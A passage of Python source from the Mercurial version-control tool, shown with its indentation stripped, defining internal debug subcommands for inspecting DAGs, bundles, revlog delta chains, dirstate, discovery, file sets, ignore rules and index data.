index, rev1, rev2 = args
r = revlog.revlog(vfsmod.vfs(encoding.getcwd(), audit=False), index)
lookup = r.lookup
elif len(args) == 2:
if not repo:
raise error.Abort(_('there is no Mercurial repository here '
'(.hg not found)'))
rev1, rev2 = args
r = repo.changelog
lookup = repo.lookup
else:
raise error.Abort(_('either two or three arguments required'))
a = r.ancestor(lookup(rev1), lookup(rev2))
ui.write('%d:%s\n' % (r.rev(a), hex(a)))
@command('debugapplystreamclonebundle', [], 'FILE')
def debugapplystreamclonebundle(ui, repo, fname):
"""apply a stream clone bundle file"""
f = hg.openpath(ui, fname)
gen = exchange.readbundle(ui, f, fname)
gen.apply(repo)
@command('debugbuilddag',
[('m', 'mergeable-file', None, _('add single file mergeable changes')),
('o', 'overwritten-file', None, _('add single file all revs overwrite')),
('n', 'new-file', None, _('add new file at each rev'))],
_('[OPTION]... [TEXT]'))
def debugbuilddag(ui, repo, text=None,
mergeable_file=False,
overwritten_file=False,
new_file=False):
"""builds a repo with a given DAG from scratch in the current empty repo
The description of the DAG is read from stdin if not given on the
command line.
Elements:
- "+n" is a linear run of n nodes based on the current default parent
- "." is a single node based on the current default parent
- "$" resets the default parent to null (implied at the start);
otherwise the default parent is always the last node created
- "<p" sets the default parent to the backref p
- "*p" is a fork at parent p, which is a backref
- "*p1/p2" is a merge of parents p1 and p2, which are backrefs
- "/p2" is a merge of the preceding node and p2
- ":tag" defines a local tag for the preceding node
- "@branch" sets the named branch for subsequent nodes
- "#...\\n" is a comment up to the end of the line
Whitespace between the above elements is ignored.
A backref is either
- a number n, which references the node curr-n, where curr is the current
node, or
- the name of a local tag you placed earlier using ":tag", or
- empty to denote the default parent.
All string valued-elements are either strictly alphanumeric, or must
be enclosed in double quotes ("..."), with "\\" as escape character.
"""
if text is None:
ui.status(_("reading DAG from stdin\n"))
text = ui.fin.read()
cl = repo.changelog
if len(cl) > 0:
raise error.Abort(_('repository is not empty'))
# determine number of revs in DAG
total = 0
for type, data in dagparser.parsedag(text):
if type == 'n':
total += 1
if mergeable_file:
linesperrev = 2
# make a file with k lines per rev
initialmergedlines = ['%d' % i
for i in pycompat.xrange(0, total * linesperrev)]
initialmergedlines.append("")
tags = []
progress = ui.makeprogress(_('building'), unit=_('revisions'),
total=total)
with progress, repo.wlock(), repo.lock(), repo.transaction("builddag"):
at = -1
atbranch = 'default'
nodeids = []
id = 0
progress.update(id)
for type, data in dagparser.parsedag(text):
if type == 'n':
ui.note(('node %s\n' % pycompat.bytestr(data)))
id, ps = data
files = []
filecontent = {}
p2 = None
if mergeable_file:
fn = "mf"
p1 = repo[ps[0]]
if len(ps) > 1:
p2 = repo[ps[1]]
pa = p1.ancestor(p2)
base, local, other = [x[fn].data() for x in (pa, p1,
p2)]
m3 = simplemerge.Merge3Text(base, local, other)
ml = [l.strip() for l in m3.merge_lines()]
ml.append("")
elif at > 0:
ml = p1[fn].data().split("\n")
else:
ml = initialmergedlines
ml[id * linesperrev] += " r%i" % id
mergedtext = "\n".join(ml)
files.append(fn)
filecontent[fn] = mergedtext
if overwritten_file:
fn = "of"
files.append(fn)
filecontent[fn] = "r%i\n" % id
if new_file:
fn = "nf%i" % id
files.append(fn)
filecontent[fn] = "r%i\n" % id
if len(ps) > 1:
if not p2:
p2 = repo[ps[1]]
for fn in p2:
if fn.startswith("nf"):
files.append(fn)
filecontent[fn] = p2[fn].data()
def fctxfn(repo, cx, path):
if path in filecontent:
return context.memfilectx(repo, cx, path,
filecontent[path])
return None
if len(ps) == 0 or ps[0] < 0:
pars = [None, None]
elif len(ps) == 1:
pars = [nodeids[ps[0]], None]
else:
pars = [nodeids[p] for p in ps]
cx = context.memctx(repo, pars, "r%i" % id, files, fctxfn,
date=(id, 0),
user="debugbuilddag",
extra={'branch': atbranch})
nodeid = repo.commitctx(cx)
nodeids.append(nodeid)
at = id
elif type == 'l':
id, name = data
ui.note(('tag %s\n' % name))
tags.append("%s %s\n" % (hex(repo.changelog.node(id)), name))
elif type == 'a':
ui.note(('branch %s\n' % data))
atbranch = data
progress.update(id)
if tags:
repo.vfs.write("localtags", "".join(tags))
def _debugchangegroup(ui, gen, all=None, indent=0, **opts):
indent_string = ' ' * indent
if all:
ui.write(("%sformat: id, p1, p2, cset, delta base, len(delta)\n")
% indent_string)
def showchunks(named):
ui.write("\n%s%s\n" % (indent_string, named))
for deltadata in gen.deltaiter():
node, p1, p2, cs, deltabase, delta, flags = deltadata
ui.write("%s%s %s %s %s %s %d\n" %
(indent_string, hex(node), hex(p1), hex(p2),
hex(cs), hex(deltabase), len(delta)))
chunkdata = gen.changelogheader()
showchunks("changelog")
chunkdata = gen.manifestheader()
showchunks("manifest")
for chunkdata in iter(gen.filelogheader, {}):
fname = chunkdata['filename']
showchunks(fname)
else:
if isinstance(gen, bundle2.unbundle20):
raise error.Abort(_('use debugbundle2 for this file'))
chunkdata = gen.changelogheader()
for deltadata in gen.deltaiter():
node, p1, p2, cs, deltabase, delta, flags = deltadata
ui.write("%s%s\n" % (indent_string, hex(node)))
def _debugobsmarkers(ui, part, indent=0, **opts):
"""display version and markers contained in 'data'"""
opts = pycompat.byteskwargs(opts)
data = part.read()
indent_string = ' ' * indent
try:
version, markers = obsolete._readmarkers(data)
except error.UnknownVersion as exc:
msg = "%sunsupported version: %s (%d bytes)\n"
msg %= indent_string, exc.version, len(data)
ui.write(msg)
else:
msg = "%sversion: %d (%d bytes)\n"
msg %= indent_string, version, len(data)
ui.write(msg)
fm = ui.formatter('debugobsolete', opts)
for rawmarker in sorted(markers):
m = obsutil.marker(None, rawmarker)
fm.startitem()
fm.plain(indent_string)
cmdutil.showmarker(fm, m)
fm.end()
def _debugphaseheads(ui, data, indent=0):
"""display version and markers contained in 'data'"""
indent_string = ' ' * indent
headsbyphase = phases.binarydecode(data)
for phase in phases.allphases:
for head in headsbyphase[phase]:
ui.write(indent_string)
ui.write('%s %s\n' % (hex(head), phases.phasenames[phase]))
def _quasirepr(thing):
if isinstance(thing, (dict, util.sortdict, collections.OrderedDict)):
return '{%s}' % (
b', '.join(b'%s: %s' % (k, thing[k]) for k in sorted(thing)))
return pycompat.bytestr(repr(thing))
def _debugbundle2(ui, gen, all=None, **opts):
"""lists the contents of a bundle2"""
if not isinstance(gen, bundle2.unbundle20):
raise error.Abort(_('not a bundle2 file'))
ui.write(('Stream params: %s\n' % _quasirepr(gen.params)))
parttypes = opts.get(r'part_type', [])
for part in gen.iterparts():
if parttypes and part.type not in parttypes:
continue
msg = '%s -- %s (mandatory: %r)\n'
ui.write((msg % (part.type, _quasirepr(part.params), part.mandatory)))
if part.type == 'changegroup':
version = part.params.get('version', '01')
cg = changegroup.getunbundler(version, part, 'UN')
if not ui.quiet:
_debugchangegroup(ui, cg, all=all, indent=4, **opts)
if part.type == 'obsmarkers':
if not ui.quiet:
_debugobsmarkers(ui, part, indent=4, **opts)
if part.type == 'phase-heads':
if not ui.quiet:
_debugphaseheads(ui, part, indent=4)
@command('debugbundle',
[('a', 'all', None, _('show all details')),
('', 'part-type', [], _('show only the named part type')),
('', 'spec', None, _('print the bundlespec of the bundle'))],
_('FILE'),
norepo=True)
def debugbundle(ui, bundlepath, all=None, spec=None, **opts):
"""lists the contents of a bundle"""
with hg.openpath(ui, bundlepath) as f:
if spec:
spec = exchange.getbundlespec(ui, f)
ui.write('%s\n' % spec)
return
gen = exchange.readbundle(ui, f, bundlepath)
if isinstance(gen, bundle2.unbundle20):
return _debugbundle2(ui, gen, all=all, **opts)
_debugchangegroup(ui, gen, all=all, **opts)
@command('debugcapabilities',
[], _('PATH'),
norepo=True)
def debugcapabilities(ui, path, **opts):
"""lists the capabilities of a remote peer"""
opts = pycompat.byteskwargs(opts)
peer = hg.peer(ui, opts, path)
caps = peer.capabilities()
ui.write(('Main capabilities:\n'))
for c in sorted(caps):
ui.write((' %s\n') % c)
b2caps = bundle2.bundle2caps(peer)
if b2caps:
ui.write(('Bundle2 capabilities:\n'))
for key, values in sorted(b2caps.iteritems()):
ui.write((' %s\n') % key)
for v in values:
ui.write((' %s\n') % v)
@command('debugcheckstate', [], '')
def debugcheckstate(ui, repo):
"""validate the correctness of the current dirstate"""
parent1, parent2 = repo.dirstate.parents()
m1 = repo[parent1].manifest()
m2 = repo[parent2].manifest()
errors = 0
for f in repo.dirstate:
state = repo.dirstate[f]
if state in "nr" and f not in m1:
ui.warn(_("%s in state %s, but not in manifest1\n") % (f, state))
errors += 1
if state in "a" and f in m1:
ui.warn(_("%s in state %s, but also in manifest1\n") % (f, state))
errors += 1
if state in "m" and f not in m1 and f not in m2:
ui.warn(_("%s in state %s, but not in either manifest\n") %
(f, state))
errors += 1
for f in m1:
state = repo.dirstate[f]
if state not in "nrm":
ui.warn(_("%s in manifest1, but listed as state %s") % (f, state))
errors += 1
if errors:
error = _(".hg/dirstate inconsistent with current parent's manifest")
raise error.Abort(error)
@command('debugcolor',
[('', 'style', None, _('show all configured styles'))],
'hg debugcolor')
def debugcolor(ui, repo, **opts):
"""show available color, effects or style"""
ui.write(('color mode: %s\n') % stringutil.pprint(ui._colormode))
if opts.get(r'style'):
return _debugdisplaystyle(ui)
else:
return _debugdisplaycolor(ui)
def _debugdisplaycolor(ui):
ui = ui.copy()
ui._styles.clear()
for effect in color._activeeffects(ui).keys():
ui._styles[effect] = effect
if ui._terminfoparams:
for k, v in ui.configitems('color'):
if k.startswith('color.'):
ui._styles[k] = k[6:]
elif k.startswith('terminfo.'):
ui._styles[k] = k[9:]
ui.write(_('available colors:\n'))
# sort label with a '_' after the other to group '_background' entry.
items = sorted(ui._styles.items(),
key=lambda i: ('_' in i[0], i[0], i[1]))
for colorname, label in items:
ui.write(('%s\n') % colorname, label=label)
def _debugdisplaystyle(ui):
ui.write(_('available style:\n'))
if not ui._styles:
return
width = max(len(s) for s in ui._styles)
for label, effects in sorted(ui._styles.items()):
ui.write('%s' % label, label=label)
if effects:
# 50
ui.write(': ')
ui.write(' ' * (max(0, width - len(label))))
ui.write(', '.join(ui.label(e, e) for e in effects.split()))
ui.write('\n')
@command('debugcreatestreamclonebundle', [], 'FILE')
def debugcreatestreamclonebundle(ui, repo, fname):
"""create a stream clone bundle file
Stream bundles are special bundles that are essentially archives of
revlog files. They are commonly used for cloning very quickly.
"""
# TODO we may want to turn this into an abort when this functionality
# is moved into `hg bundle`.
if phases.hassecret(repo):
ui.warn(_('(warning: stream clone bundle will contain secret '
'revisions)\n'))
requirements, gen = streamclone.generatebundlev1(repo)
changegroup.writechunks(ui, gen, fname)
ui.write(_('bundle requirements: %s\n') % ', '.join(sorted(requirements)))
@command('debugdag',
[('t', 'tags', None, _('use tags as labels')),
('b', 'branches', None, _('annotate with branch names')),
('', 'dots', None, _('use dots for runs')),
('s', 'spaces', None, _('separate elements by spaces'))],
_('[OPTION]... [FILE [REV]...]'),
optionalrepo=True)
def debugdag(ui, repo, file_=None, *revs, **opts):
"""format the changelog or an index DAG as a concise textual description
If you pass a revlog index, the revlog's DAG is emitted. If you list
revision numbers, they get labeled in the output as rN.
Otherwise, the changelog DAG of the current repo is emitted.
"""
spaces = opts.get(r'spaces')
dots = opts.get(r'dots')
if file_:
rlog = revlog.revlog(vfsmod.vfs(encoding.getcwd(), audit=False),
file_)
revs = set((int(r) for r in revs))
def events():
for r in rlog:
yield 'n', (r, list(p for p in rlog.parentrevs(r)
if p != -1))
if r in revs:
yield 'l', (r, "r%i" % r)
elif repo:
cl = repo.changelog
tags = opts.get(r'tags')
branches = opts.get(r'branches')
if tags:
labels = {}
for l, n in repo.tags().items():
labels.setdefault(cl.rev(n), []).append(l)
def events():
b = "default"
for r in cl:
if branches:
newb = cl.read(cl.node(r))[5]['branch']
if newb != b:
yield 'a', newb
b = newb
yield 'n', (r, list(p for p in cl.parentrevs(r)
if p != -1))
if tags:
ls = labels.get(r)
if ls:
for l in ls:
yield 'l', (r, l)
else:
raise error.Abort(_('need repo for changelog dag'))
for line in dagparser.dagtextlines(events(),
addspaces=spaces,
wraplabels=True,
wrapannotations=True,
wrapnonlinear=dots,
usedots=dots,
maxlinewidth=70):
ui.write(line)
ui.write("\n")
@command('debugdata', cmdutil.debugrevlogopts, _('-c|-m|FILE REV'))
def debugdata(ui, repo, file_, rev=None, **opts):
"""dump the contents of a data file revision"""
opts = pycompat.byteskwargs(opts)
if opts.get('changelog') or opts.get('manifest') or opts.get('dir'):
if rev is not None:
raise error.CommandError('debugdata', _('invalid arguments'))
file_, rev = None, file_
elif rev is None:
raise error.CommandError('debugdata', _('invalid arguments'))
r = cmdutil.openstorage(repo, 'debugdata', file_, opts)
try:
ui.write(r.revision(r.lookup(rev), raw=True))
except KeyError:
raise error.Abort(_('invalid revision identifier %s') % rev)
@command('debugdate',
[('e', 'extended', None, _('try extended date formats'))],
_('[-e] DATE [RANGE]'),
norepo=True, optionalrepo=True)
def debugdate(ui, date, range=None, **opts):
"""parse and display a date"""
if opts[r"extended"]:
d = dateutil.parsedate(date, util.extendeddateformats)
else:
d = dateutil.parsedate(date)
ui.write(("internal: %d %d\n") % d)
ui.write(("standard: %s\n") % dateutil.datestr(d))
if range:
m = dateutil.matchdate(range)
ui.write(("match: %s\n") % m(d[0]))
@command('debugdeltachain',
cmdutil.debugrevlogopts + cmdutil.formatteropts,
_('-c|-m|FILE'),
optionalrepo=True)
def debugdeltachain(ui, repo, file_=None, **opts):
"""dump information about delta chains in a revlog
Output can be templatized. Available template keywords are:
:``rev``: revision number
:``chainid``: delta chain identifier (numbered by unique base)
:``chainlen``: delta chain length to this revision
:``prevrev``: previous revision in delta chain
:``deltatype``: role of delta / how it was computed
:``compsize``: compressed size of revision
:``uncompsize``: uncompressed size of revision
:``chainsize``: total size of compressed revisions in chain
:``chainratio``: total chain size divided by uncompressed revision size
(new delta chains typically start at ratio 2.00)
:``lindist``: linear distance from base revision in delta chain to end
of this revision
:``extradist``: total size of revisions not part of this delta chain from
base of delta chain to end of this revision; a measurement
of how much extra data we need to read/seek across to read
the delta chain for this revision
:``extraratio``: extradist divided by chainsize; another representation of
how much unrelated data is needed to load this delta chain
If the repository is configured to use the sparse read, additional keywords
are available:
:``readsize``: total size of data read from the disk for a revision
(sum of the sizes of all the blocks)
:``largestblock``: size of the largest block of data read from the disk
:``readdensity``: density of useful bytes in the data read from the disk
:``srchunks``: in how many data hunks the whole revision would be read
The sparse read can be enabled with experimental.sparse-read = True
"""
opts = pycompat.byteskwargs(opts)
r = cmdutil.openrevlog(repo, 'debugdeltachain', file_, opts)
index = r.index
start = r.start
length = r.length
generaldelta = r.version & revlog.FLAG_GENERALDELTA
withsparseread = getattr(r, '_withsparseread', False)
def revinfo(rev):
e = index[rev]
compsize = e[1]
uncompsize = e[2]
chainsize = 0
if generaldelta:
if e[3] == e[5]:
deltatype = 'p1'
elif e[3] == e[6]:
deltatype = 'p2'
elif e[3] == rev - 1:
deltatype = 'prev'
elif e[3] == rev:
deltatype = 'base'
else:
deltatype = 'other'
else:
if e[3] == rev:
deltatype = 'base'
else:
deltatype = 'prev'
chain = r._deltachain(rev)[0]
for iterrev in chain:
e = index[iterrev]
chainsize += e[1]
return compsize, uncompsize, deltatype, chain, chainsize
fm = ui.formatter('debugdeltachain', opts)
fm.plain(' rev chain# chainlen prev delta '
'size rawsize chainsize ratio lindist extradist '
'extraratio')
if withsparseread:
fm.plain(' readsize largestblk rddensity srchunks')
fm.plain('\n')
chainbases = {}
for rev in r:
comp, uncomp, deltatype, chain, chainsize = revinfo(rev)
chainbase = chain[0]
chainid = chainbases.setdefault(chainbase, len(chainbases) + 1)
basestart = start(chainbase)
revstart = start(rev)
lineardist = revstart + comp - basestart
extradist = lineardist - chainsize
try:
prevrev = chain[-2]
except IndexError:
prevrev = -1
if uncomp != 0:
chainratio = float(chainsize) / float(uncomp)
else:
chainratio = chainsize
if chainsize != 0:
extraratio = float(extradist) / float(chainsize)
else:
extraratio = extradist
fm.startitem()
fm.write('rev chainid chainlen prevrev deltatype compsize '
'uncompsize chainsize chainratio lindist extradist '
'extraratio',
'%7d %7d %8d %8d %7s %10d %10d %10d %9.5f %9d %9d %10.5f',
rev, chainid, len(chain), prevrev, deltatype, comp,
uncomp, chainsize, chainratio, lineardist, extradist,
extraratio,
rev=rev, chainid=chainid, chainlen=len(chain),
prevrev=prevrev, deltatype=deltatype, compsize=comp,
uncompsize=uncomp, chainsize=chainsize,
chainratio=chainratio, lindist=lineardist,
extradist=extradist, extraratio=extraratio)
if withsparseread:
readsize = 0
largestblock = 0
srchunks = 0
for revschunk in deltautil.slicechunk(r, chain):
srchunks += 1
blkend = start(revschunk[-1]) + length(revschunk[-1])
blksize = blkend - start(revschunk[0])
readsize += blksize
if largestblock < blksize:
largestblock = blksize
if readsize:
readdensity = float(chainsize) / float(readsize)
else:
readdensity = 1
fm.write('readsize largestblock readdensity srchunks',
' %10d %10d %9.5f %8d',
readsize, largestblock, readdensity, srchunks,
readsize=readsize, largestblock=largestblock,
readdensity=readdensity, srchunks=srchunks)
fm.plain('\n')
fm.end()
@command('debugdirstate|debugstate',
[('', 'nodates', None, _('do not display the saved mtime (DEPRECATED)')),
('', 'dates', True, _('display the saved mtime')),
('', 'datesort', None, _('sort by saved mtime'))],
_('[OPTION]...'))
def debugstate(ui, repo, **opts):
"""show the contents of the current dirstate"""
nodates = not opts[r'dates']
if opts.get(r'nodates') is not None:
nodates = True
datesort = opts.get(r'datesort')
timestr = ""
if datesort:
keyfunc = lambda x: (x[1][3], x[0]) # sort by mtime, then by filename
else:
keyfunc = None # sort by filename
for file_, ent in sorted(repo.dirstate._map.iteritems(), key=keyfunc):
if ent[3] == -1:
timestr = 'unset '
elif nodates:
timestr = 'set '
else:
timestr = time.strftime(r"%Y-%m-%d %H:%M:%S ",
time.localtime(ent[3]))
timestr = encoding.strtolocal(timestr)
if ent[1] & 0o20000:
mode = 'lnk'
else:
mode = '%3o' % (ent[1] & 0o777 & ~util.umask)
ui.write("%c %s %10d %s%s\n" % (ent[0], mode, ent[2], timestr, file_))
for f in repo.dirstate.copies():
ui.write(_("copy: %s -> %s\n") % (repo.dirstate.copied(f), f))
@command('debugdiscovery',
[('', 'old', None, _('use old-style discovery')),
('', 'nonheads', None,
_('use old-style discovery with non-heads included')),
('', 'rev', [], 'restrict discovery to this set of revs'),
] + cmdutil.remoteopts,
_('[--rev REV] [OTHER]'))
def debugdiscovery(ui, repo, remoteurl="default", **opts):
"""runs the changeset discovery protocol in isolation"""
opts = pycompat.byteskwargs(opts)
remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl))
remote = hg.peer(repo, opts, remoteurl)
ui.status(_('comparing with %s\n') % util.hidepassword(remoteurl))
# make sure tests are repeatable
random.seed(12323)
def doit(pushedrevs, remoteheads, remote=remote):
if opts.get('old'):
if not util.safehasattr(remote, 'branches'):
# enable in-client legacy support
remote = localrepo.locallegacypeer(remote.local())
common, _in, hds = treediscovery.findcommonincoming(repo, remote,
force=True)
common = set(common)
if not opts.get('nonheads'):
ui.write(("unpruned common: %s\n") %
" ".join(sorted(short(n) for n in common)))
clnode = repo.changelog.node
common = repo.revs('heads(::%ln)', common)
common = {clnode(r) for r in common}
else:
nodes = None
if pushedrevs:
revs = scmutil.revrange(repo, pushedrevs)
nodes = [repo[r].node() for r in revs]
common, any, hds = setdiscovery.findcommonheads(ui, repo, remote,
ancestorsof=nodes)
common = set(common)
rheads = set(hds)
lheads = set(repo.heads())
ui.write(("common heads: %s\n") %
" ".join(sorted(short(n) for n in common)))
if lheads <= common:
ui.write(("local is subset\n"))
elif rheads <= common:
ui.write(("remote is subset\n"))
remoterevs, _checkout = hg.addbranchrevs(repo, remote, branches, revs=None)
localrevs = opts['rev']
doit(localrevs, remoterevs)
_chunksize = 4 << 10
@command('debugdownload',
[
('o', 'output', '', _('path')),
],
optionalrepo=True)
def debugdownload(ui, repo, url, output=None, **opts):
"""download a resource using Mercurial logic and config
"""
fh = urlmod.open(ui, url, output)
dest = ui
if output:
dest = open(output, "wb", _chunksize)
try:
data = fh.read(_chunksize)
while data:
dest.write(data)
data = fh.read(_chunksize)
finally:
if output:
dest.close()
@command('debugextensions', cmdutil.formatteropts, [], optionalrepo=True)
def debugextensions(ui, repo, **opts):
'''show information about active extensions'''
opts = pycompat.byteskwargs(opts)
exts = extensions.extensions(ui)
hgver = util.version()
fm = ui.formatter('debugextensions', opts)
for extname, extmod in sorted(exts, key=operator.itemgetter(0)):
isinternal = extensions.ismoduleinternal(extmod)
extsource = pycompat.fsencode(extmod.__file__)
if isinternal:
exttestedwith = [] # never expose magic string to users
else:
exttestedwith = getattr(extmod, 'testedwith', '').split()
extbuglink = getattr(extmod, 'buglink', None)
fm.startitem()
if ui.quiet or ui.verbose:
fm.write('name', '%s\n', extname)
else:
fm.write('name', '%s', extname)
if isinternal or hgver in exttestedwith:
fm.plain('\n')
elif not exttestedwith:
fm.plain(_(' (untested!)\n'))
else:
lasttestedversion = exttestedwith[-1]
fm.plain(' (%s!)\n' % lasttestedversion)
fm.condwrite(ui.verbose and extsource, 'source',
_(' location: %s\n'), extsource or "")
if ui.verbose:
fm.plain(_(' bundled: %s\n') % ['no', 'yes'][isinternal])
fm.data(bundled=isinternal)
fm.condwrite(ui.verbose and exttestedwith, 'testedwith',
_(' tested with: %s\n'),
fm.formatlist(exttestedwith, name='ver'))
fm.condwrite(ui.verbose and extbuglink, 'buglink',
_(' bug reporting: %s\n'), extbuglink or "")
fm.end()
@command('debugfileset',
[('r', 'rev', '', _('apply the filespec on this revision'), _('REV')),
('', 'all-files', False,
_('test files from all revisions and working directory')),
('s', 'show-matcher', None,
_('print internal representation of matcher')),
('p', 'show-stage', [],
_('print parsed tree at the given stage'), _('NAME'))],
_('[-r REV] [--all-files] [OPTION]... FILESPEC'))
def debugfileset(ui, repo, expr, **opts):
'''parse and apply a fileset specification'''
from . import fileset
fileset.symbols # force import of fileset so we have predicates to optimize
opts = pycompat.byteskwargs(opts)
ctx = scmutil.revsingle(repo, opts.get('rev'), None)
stages = [
('parsed', pycompat.identity),
('analyzed', filesetlang.analyze),
('optimized', filesetlang.optimize),
]
stagenames = set(n for n, f in stages)
showalways = set()
if ui.verbose and not opts['show_stage']:
# show parsed tree by --verbose (deprecated)
showalways.add('parsed')
if opts['show_stage'] == ['all']:
showalways.update(stagenames)
else:
for n in opts['show_stage']:
if n not in stagenames:
raise error.Abort(_('invalid stage name: %s') % n)
showalways.update(opts['show_stage'])
tree = filesetlang.parse(expr)
for n, f in stages:
tree = f(tree)
if n in showalways:
if opts['show_stage'] or n != 'parsed':
ui.write(("* %s:\n") % n)
ui.write(filesetlang.prettyformat(tree), "\n")
files = set()
if opts['all_files']:
for r in repo:
c = repo[r]
files.update(c.files())
files.update(c.substate)
if opts['all_files'] or ctx.rev() is None:
wctx = repo[None]
files.update(repo.dirstate.walk(scmutil.matchall(repo),
subrepos=list(wctx.substate),
unknown=True, ignored=True))
files.update(wctx.substate)
else:
files.update(ctx.files())
files.update(ctx.substate)
m = ctx.matchfileset(expr)
if opts['show_matcher'] or (opts['show_matcher'] is None and ui.verbose):
ui.write(('* matcher:\n'), stringutil.prettyrepr(m), '\n')
for f in sorted(files):
if not m(f):
continue
ui.write("%s\n" % f)
@command('debugformat',
[] + cmdutil.formatteropts)
def debugformat(ui, repo, **opts):
"""display format information about the current repository
Use --verbose to get extra information about current config value and
Mercurial default."""
opts = pycompat.byteskwargs(opts)
maxvariantlength = max(len(fv.name) for fv in upgrade.allformatvariant)
maxvariantlength = max(len('format-variant'), maxvariantlength)
def makeformatname(name):
return '%s:' + (' ' * (maxvariantlength - len(name)))
fm = ui.formatter('debugformat', opts)
if fm.isplain():
def formatvalue(value):
if util.safehasattr(value, 'startswith'):
return value
if value:
return 'yes'
else:
return 'no'
else:
formatvalue = pycompat.identity
fm.plain('format-variant')
fm.plain(' ' * (maxvariantlength - len('format-variant')))
fm.plain(' repo')
if ui.verbose:
fm.plain(' config default')
fm.plain('\n')
for fv in upgrade.allformatvariant:
fm.startitem()
repovalue = fv.fromrepo(repo)
configvalue = fv.fromconfig(repo)
if repovalue != configvalue:
namelabel = 'formatvariant.name.mismatchconfig'
repolabel = 'formatvariant.repo.mismatchconfig'
elif repovalue != fv.default:
namelabel = 'formatvariant.name.mismatchdefault'
repolabel = 'formatvariant.repo.mismatchdefault'
else:
namelabel = 'formatvariant.name.uptodate'
repolabel = 'formatvariant.repo.uptodate'
fm.write('name', makeformatname(fv.name), fv.name,
label=namelabel)
fm.write('repo', ' %3s', formatvalue(repovalue),
label=repolabel)
if fv.default != configvalue:
configlabel = 'formatvariant.config.special'
else:
configlabel = 'formatvariant.config.default'
fm.condwrite(ui.verbose, 'config', ' %6s', formatvalue(configvalue),
label=configlabel)
fm.condwrite(ui.verbose, 'default', ' %7s', formatvalue(fv.default),
label='formatvariant.default')
fm.plain('\n')
fm.end()
@command('debugfsinfo', [], _('[PATH]'), norepo=True)
def debugfsinfo(ui, path="."):
"""show information detected about current filesystem"""
ui.write(('path: %s\n') % path)
ui.write(('mounted on: %s\n') % (util.getfsmountpoint(path) or '(unknown)'))
ui.write(('exec: %s\n') % (util.checkexec(path) and 'yes' or 'no'))
ui.write(('fstype: %s\n') % (util.getfstype(path) or '(unknown)'))
ui.write(('symlink: %s\n') % (util.checklink(path) and 'yes' or 'no'))
ui.write(('hardlink: %s\n') % (util.checknlink(path) and 'yes' or 'no'))
casesensitive = '(unknown)'
try:
with pycompat.namedtempfile(prefix='.debugfsinfo', dir=path) as f:
casesensitive = util.fscasesensitive(f.name) and 'yes' or 'no'
except OSError:
pass
ui.write(('case-sensitive: %s\n') % casesensitive)
@command('debuggetbundle',
[('H', 'head', [], _('id of head node'), _('ID')),
('C', 'common', [], _('id of common node'), _('ID')),
('t', 'type', 'bzip2', _('bundle compression type to use'), _('TYPE'))],
_('REPO FILE [-H|-C ID]...'),
norepo=True)
def debuggetbundle(ui, repopath, bundlepath, head=None, common=None, **opts):
"""retrieves a bundle from a repo
Every ID must be a full-length hex node id string. Saves the bundle to the
given file.
"""
opts = pycompat.byteskwargs(opts)
repo = hg.peer(ui, opts, repopath)
if not repo.capable('getbundle'):
raise error.Abort("getbundle() not supported by target repository")
args = {}
if common:
args[r'common'] = [bin(s) for s in common]
if head:
args[r'heads'] = [bin(s) for s in head]
# TODO: get desired bundlecaps from command line.
args[r'bundlecaps'] = None
bundle = repo.getbundle('debug', **args)
bundletype = opts.get('type', 'bzip2').lower()
btypes = {'none': 'HG10UN',
'bzip2': 'HG10BZ',
'gzip': 'HG10GZ',
'bundle2': 'HG20'}
bundletype = btypes.get(bundletype)
if bundletype not in bundle2.bundletypes:
raise error.Abort(_('unknown bundle type specified with --type'))
bundle2.writebundle(ui, bundle, bundlepath, bundletype)
@command('debugignore', [], '[FILE]')
def debugignore(ui, repo, *files, **opts):
"""display the combined ignore pattern and information about ignored files
With no argument display the combined ignore pattern.
Given space separated file names, shows if the given file is ignored and
if so, show the ignore rule (file and line number) that matched it.
"""
ignore = repo.dirstate._ignore
if not files:
# Show all the patterns
ui.write("%s\n" % pycompat.byterepr(ignore))
else:
m = scmutil.match(repo[None], pats=files)
for f in m.files():
nf = util.normpath(f)
ignored = None
ignoredata = None
if nf != '.':
if ignore(nf):
ignored = nf
ignoredata = repo.dirstate._ignorefileandline(nf)
else:
for p in util.finddirs(nf):
if ignore(p):
ignored = p
ignoredata = repo.dirstate._ignorefileandline(p)
break
if ignored:
if ignored == nf:
ui.write(_("%s is ignored\n") % m.uipath(f))
else:
ui.write(_("%s is ignored because of "
"containing folder %s\n")
% (m.uipath(f), ignored))
ignorefile, lineno, line = ignoredata
ui.write(_("(ignore rule in %s, line %d: '%s')\n")
% (ignorefile, lineno, line))
else:
ui.write(_("%s is not ignored\n") % m.uipath(f))
@command('debugindex', cmdutil.debugrevlogopts + cmdutil.formatteropts,
_('-c|-m|FILE'))
def debugindex(ui, repo, file_=None, **opts):
"""dump index data for a storage primitive"""
opts = pycompat.byteskwargs(opts)
store = cmdutil.openstorage(repo, 'debugindex', file_, opts)
if ui.debugflag:
shortfn = hex
else:
shortfn = short
idlen = 12
for i in store:
idlen = len(shortfn(store.node(i)))
break
fm = ui.formatter('debugindex', opts)
fm.plain(b' rev linkrev %s %s p2\n' % (
b'nodeid'.ljust(idlen),
b'p1'.ljust(idlen)))
for rev in store:
node = store.node(rev)
parents = store.parents(node)
fm.startitem()
fm.write(b'rev', b'%6d ', rev)
fm.write(b'linkrev', '%7d ', store.linkrev(rev))
fm.write(b'node', '%s ', shortfn(node))
fm.write(b'p1', '%s ', shortfn(parents[0]))
fm.write(b'p2', '%s', shortfn(parents[1]))
fm.plain(b'\n')
fm.end()
@command('debugindexdot', cmdutil.debugrevlogopts,
_('-c|-m|FILE'), optionalrepo=True)
def debugindexdot(ui, repo, file_=None, **opts):
"""dump an index DAG as a graphviz dot file"""
opts = pycompat.byteskwargs(opts)
r = cmdutil.openstorage(repo, 'debugindexdot', file_, opts)
ui.write(("digraph G {\n"))
for i in r:
node = r.node(i)
pp = r.parents(node)
ui.write("\t%d -> %d\n" % (r.rev(pp[0]), i))
if pp[1] != nullid:
ui.write("\t%d -> %d\n" % (r.rev(pp[1]), i))
ui.write("}\n")
@command('debugindexstats', [])
def debugindexstats(ui, repo):
"""show stats related to the changelog index"""
repo.changelog.shortest(nullid, 1)
index = repo.changelog.index
if not util.safehasattr(index, 'stats'):
raise error.Abort(_('debugindexstats only works with native code'))
for k, v in sorted(index.stats().items()):
ui.write('%s: %s\n' % (k, v))
@command('debuginstall', [] + cmdutil.formatteropts, '', norepo=True)
def debuginstall(ui, **opts):
'''test Mercurial installation
Returns 0 on success.
'''
opts = pycompat.byteskwargs(opts)
def writetemp(contents):
